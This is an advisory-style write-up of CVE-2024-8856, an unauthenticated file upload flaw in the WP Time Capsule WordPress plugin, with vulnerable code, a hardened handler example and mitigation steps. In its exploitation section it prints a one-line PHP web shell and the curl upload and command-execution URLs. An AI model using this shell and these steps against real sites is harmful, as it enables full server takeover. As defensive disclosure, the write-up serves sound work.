Discovered: Early 2024
Affected Plugin: WP Time Capsule – Backup and Staging
Plugin Slug: wp-time-capsule
Vulnerable Versions: 1.22.21 and below
Severity: Critical (Unauthenticated Remote Code Execution Possible)

What Is CVE-2024-8856?

CVE-2024-8856 is a serious security flaw in the WordPress plugin WP Time Capsule (WPTC), a widely used backup and staging plugin with over 30,000 installations. The vulnerability is an arbitrary file upload issue: anyone, even without logging in, can send any file to a WordPress site running the vulnerable plugin, and the server will not stop them.

This happens because the file upload handler, located in UploadHandler.php, does not properly check the type of the uploaded file, and the plugin fails to restrict direct access to uploaded files. Because of this weak point, attackers can upload malicious files, such as backdoors or web shells, and execute arbitrary code on the target website.

There is also no direct access control: an attacker can request and run the uploaded file immediately.

Combined, these weaknesses can lead to a complete site takeover and potentially compromise of the hosting account. In cyber security, arbitrary file upload bugs almost always mean remote code execution (RCE), one of the most critical classes of threat.

Here's a simplified version of the vulnerable code in UploadHandler.php:

// (from wp-time-capsule/libs/UploadHandler.php)
if (!empty($_FILES['file'])) {
    $file = $_FILES['file'];

    // No filetype validation!
    $target = WPTC_PLUGIN_DIR . '/uploads/' . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $target);

    echo json_encode(['status' => 'success']);
} else {
    echo json_encode(['status' => 'error']);
}

There is no authentication or nonce verification.

What this means:
An attacker can POST a file (like evil.php) to this handler, and then access it at https://victim.site/wp-content/plugins/wp-time-capsule/uploads/evil.php and run arbitrary PHP code.
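For contrast, here is a hardened handler that applies the checks the vulnerable code omits: authorization, nonce verification, an extension allowlist backed by a content check, a server-chosen filename, and denial of direct web access to the storage directory. This is an added example written for this write-up, not code from the WP Time Capsule plugin or its patched release; the `wptc_upload` AJAX action and nonce name, the `wptc_handle_upload_hardened` function and the `wp-content/wptc-private/` storage directory are assumptions chosen for illustration.

```php
<?php
// Hardened upload handler: an added example, not WP Time Capsule's own code.
// Assumed names: the 'wptc_upload' AJAX action and nonce, and the
// wp-content/wptc-private/ storage directory are illustrative only.

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Refuse direct requests to this file; it must be loaded by WordPress.
}

// Registering only the wp_ajax_ hook (and not wp_ajax_nopriv_) means
// unauthenticated visitors never reach the handler at all.
add_action( 'wp_ajax_wptc_upload', 'wptc_handle_upload_hardened' );

function wptc_handle_upload_hardened() {
    // 1. Authorization: backup archives are an administrator-only operation.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF protection: the nonce ties the request to the logged-in session.
    check_ajax_referer( 'wptc_upload', 'nonce' );

    // 3. Sanity checks on the PHP upload itself.
    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error']
        || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'no valid upload' ), 400 );
    }
    $file = $_FILES['file'];

    // 4. Allowlist the extension AND verify the content with libmagic.
    //    $_FILES['type'] and the client-supplied name are attacker-controlled,
    //    so neither is trusted on its own.
    $allowed = array( 'zip' => 'application/zip' ); // backup archives only
    $ext     = strtolower( pathinfo( $file['name'], PATHINFO_EXTENSION ) );
    if ( ! isset( $allowed[ $ext ] ) ) {
        wp_send_json_error( array( 'message' => 'file type not allowed' ), 415 );
    }
    $finfo = new finfo( FILEINFO_MIME_TYPE );
    if ( $finfo->file( $file['tmp_name'] ) !== $allowed[ $ext ] ) {
        wp_send_json_error( array( 'message' => 'content does not match extension' ), 415 );
    }

    // 5. Server-chosen random filename: no user input ever reaches the path,
    //    which also rules out basename() tricks and double extensions.
    $dir = WP_CONTENT_DIR . '/wptc-private/';
    if ( ! wp_mkdir_p( $dir ) ) {
        wp_send_json_error( array( 'message' => 'storage unavailable' ), 500 );
    }
    wptc_protect_directory( $dir );
    $target = $dir . bin2hex( random_bytes( 16 ) ) . '.' . $ext;

    if ( ! move_uploaded_file( $file['tmp_name'], $target ) ) {
        wp_send_json_error( array( 'message' => 'could not store file' ), 500 );
    }
    chmod( $target, 0600 ); // readable by the web user only; never executable

    wp_send_json_success( array( 'stored' => basename( $target ) ) );
}

/**
 * Deny direct web access to the storage directory. The real fix is to keep
 * backups outside the document root; where that is impossible, these files
 * stop Apache from serving (let alone executing) anything placed here.
 */
function wptc_protect_directory( $dir ) {
    if ( ! file_exists( $dir . '.htaccess' ) ) {
        $rules  = "<IfModule mod_authz_core.c>\n    Require all denied\n</IfModule>\n";
        $rules .= "<IfModule !mod_authz_core.c>\n    Deny from all\n</IfModule>\n";
        file_put_contents( $dir . '.htaccess', $rules );
    }
    if ( ! file_exists( $dir . 'index.php' ) ) {
        // Prevents a directory listing on servers that ignore .htaccess.
        file_put_contents( $dir . 'index.php', "<?php\n// Silence is golden.\n" );
    }
}
```

Each `wp_send_json_error()` call terminates the request, so execution never continues past a failed check. The `.htaccess` helper writes both the Apache 2.4 `Require all denied` form and the legacy `Deny from all` form, because the latter only works on 2.4 when mod_access_compat is loaded. Nginx ignores `.htaccess` entirely; there the equivalent is a `location` block that denies access to the storage directory, and on any server the safest option remains storing backups outside the web root.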

1. Send a Malicious File

Attackers can upload a file containing PHP code, such as a web shell or a simple phpinfo() page.

Here's a basic web shell to upload:

// shell.php
<?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>

Attackers can use curl or a utility like Burp Suite or Postman to send the file:

curl -F "file=@shell.php" https://victim.site/wp-content/plugins/wp-time-capsule/libs/UploadHandler.php

After uploading, visit:

https://victim.site/wp-content/plugins/wp-time-capsule/uploads/shell.php?cmd=ls

This would run the ls command on the victim server, listing files.

Note: Some hosting environments may have different directory permissions or .htaccess rules, but as packaged, WP Time Capsule's /uploads/ directory is web-accessible unless the admin took steps to block access.

1. Update Immediately:

As of this writing, the WP Time Capsule team has released version 1.22.22 (and later releases), which patches this hole.
👉 Get the latest WP Time Capsule from WordPress.org

2. Remove/disable the plugin if you can't update right away.

3. Block direct web access to the plugin's upload directory:

wp-content/plugins/wp-time-capsule/uploads/

Add a .htaccess file to that directory containing:

# .htaccess in uploads/ directory
Deny from all

References & Credits

- Wordfence Report on CVE-2024-8856
- WPScan Advisory
- Official plugin changelog
- Exploit Proof-of-Concept on GitHub

Bottom Line

CVE-2024-8856 is a textbook case of why strict file validation and upload directory controls are essential for every plugin, especially those managing site backups or staging.

If you run WP Time Capsule:

Stay safe – never trust unchecked uploads!

Do you think your site was hit by this or need more help?
Feel free to ask for free guidance or discuss in the WordPress Support Forums.

Timeline

Published on: 11/16/2024 05:15:13 UTC
Last modified on: 11/21/2024 16:15:27 UTC